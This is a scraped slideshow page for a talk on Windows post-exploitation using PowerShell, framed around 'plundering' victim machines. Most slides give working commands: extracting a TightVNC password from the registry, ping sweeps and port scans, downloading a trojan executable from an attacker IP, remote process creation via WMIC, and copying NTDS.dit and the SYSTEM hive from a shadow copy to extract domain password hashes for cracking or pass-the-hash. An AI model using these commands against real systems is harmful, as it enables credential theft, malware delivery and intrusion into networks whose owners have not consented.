Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Post exploitation using powershell

141 views

Published on

This encompasses different techniques employed by leveraging powershell and attacking the systems in different ways. It is an interesting agglomeration of combined methods in plundering a windows box

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Post exploitation using powershell

  1. 1. Post exploitation using powershell
  2. 2. $whoami MIHIR SHAH | SHAHENSHAH Github : github.com/shahenshah99
  3. 3. Powershell Fundamentals PowerShell is a command-line and scripting language framework for task automation and configuration management. For the Windows pen tester of today, it's a comprehensive and powerful tool in your arsenal that just so happens to be installed on all of your victim PCs.
  4. 4. What is Powershell? When I described PowerShell as a task automation and configuration management framework, that's more along the lines of Microsoft's definition of PowerShell. As hackers, we think of what things can do, not necessarily how their creators defined them; in that sense, PowerShell is the Windows command line on steroids.
  5. 5. Powershell Cmdlets A cmdlet is really just a command, at least conceptually; behind the scenes, they're .NET classes for implementing particular functionality. They're the native body of commands within PowerShell and they use a unique self- explanatory syntax style: Verb-Noun.
  6. 6. Working With registry > $FormatEnumerationLimit = -1 > Get-ItemProperty -Path registry::hklmsoftwareTightVNCServer -Name ControlPassword > $password = 139, 16, 57, 246, 188, 35, 53, 209 > ForEach ($hex in $password) { >> [Convert]::ToString($hex, 16) }
  7. 7. ICMP Enum So, you have your foothold on a Windows box. Setting aside the possibility of uploading our own tools, can we use a plain off-the-shelf copy of Windows to poke around for a potential next stepping stone? With PowerShell, there isn't much we can't do.
  8. 8. > 1..255 | % {echo "192.168.63.$_"; ping -n 1 -w 100 192.168.63.$_ | Select-String ttl}
  9. 9. if we have the access to fire off PowerShell, don't we have the access to meterpreter our way in and/or upload a tool set?
  10. 10. Now that we have a host in mind, we can learn more about it with this one liner designed to attempt TCP connections to all specified ports:
  11. 11. > 1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("192.168.63.147 ", $_)) "Open port - $_"} 2>$null
  12. 12. Delivering a Trojan to your target via PowerShell > (New-Object System.Net.WebClient).DownloadFile("http://192.16 8.63.143/attack1.exe", "c:windowstempattack1.exe")
  13. 13. Named pipes and security Concepts The named pipe concept gives the pipe a name, and by having a name, it utilizes the filesystem so that interaction with it is like interacting with a file. Remember the purpose of our pipelines, to take the output of a command and pipe it as input to another command.
  14. 14. named pipes, although they work a lot like files, cannot actually be mounted in the filesystem. They have their own filesystem and are referenced with .pipe[name]. There are functions available to the software developer to work with named pipes (for example CreateFile, WriteFile, and CloseHandle)
  15. 15. WMIC WMIC is the name of a tool and it stands for Windows Management Instrumentation Command.
  16. 16. The tool allows us to perform WMI operations. WMI is the Windows infrastructure for operations and management data. In addition to providing management data to other parts of Windows and other products altogether, it's possible to automate administrative tasks both locally and remotely with WMI scripts and applications
  17. 17. WMIC commands fired off at the command line leave no traces of software or code lying around. While WMI activity can be logged, many organizations fail to turn it on or review the logs. In almost any Windows environment, WMI and PowerShell can't be blocked.
  18. 18. TRY THIS useraccount list /format:list
  19. 19. Being a little Ambitious? /node:[IP address] /user:[DOMAIN][User] computersystem list brief /format:list
  20. 20. How about actually spawning something? /node:[IP address] /user:[DOMAIN][User] header: path win32_process call create "calc.exe"
  21. 21. Any Ideas?
  22. 22. Plundering Domain Controllers by vssadmin
  23. 23. Creating a shadow file > vssadmin Create Shadow /For=C:
  24. 24. The NTDS database is stored in the NTDS directory under Windows, and you'll find SYSTEM inside the system32config folder.
  25. 25. Creating a copy of the shadow file to retrieve by the attacking box > copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy1 WindowsNTDSNTDS.dit c: > copy ?GLOBALROOTDeviceHarddiskVolumeShadowCo py1Windowssystem32configSYSTEM c:
  26. 26. Retrieving files your favourite way apt-get install cifs-utils
  27. 27. Mount the filesystem to the attacking box mount -t cifs //<IP>/C$ -o username=Administrator /root/mount/
  28. 28. Password hash extraction with libesedb and ntdsxtract # git clone https://github.com/libyal/libesedb # git clone https://github.com/csababarta/ntdsxtract # cd libesedb # apt-get install git autoconf automake autopoint libtool pkg-config build- essentia l# ./synclibs.sh # ./autogen.sh # chmod +x configure # ./configure # make # make install # ldconfig
  29. 29. Exporting all the tables from NTDS database # esedbexport -m tables ntds.dit
  30. 30. Where’s the hash? We can pass the data table and link table to the dsusers Python script, along with the location of the SYSTEM hive (which contains the SYSKEY), and ask the script to nicely format our hashes into a cracker-friendly format:
  31. 31. # cd ntdsxtract # python dsusers.py /root/ntds/ntds.dit.export/datatable /root/ntds/ntds.dit.export/link_table /root/ntds -- syshive /root/ntds/SYSTEM --passwordhashes - -lmoutfile /root/ntds/lm.txt --ntoutfile /root/ntds/nt.txt --pwdformat ophc
  32. 32. You may either crack the password using John or just pass-the-hash using mimikatz
  33. 33. Any Questions?
  34. 34. THANK YOU

×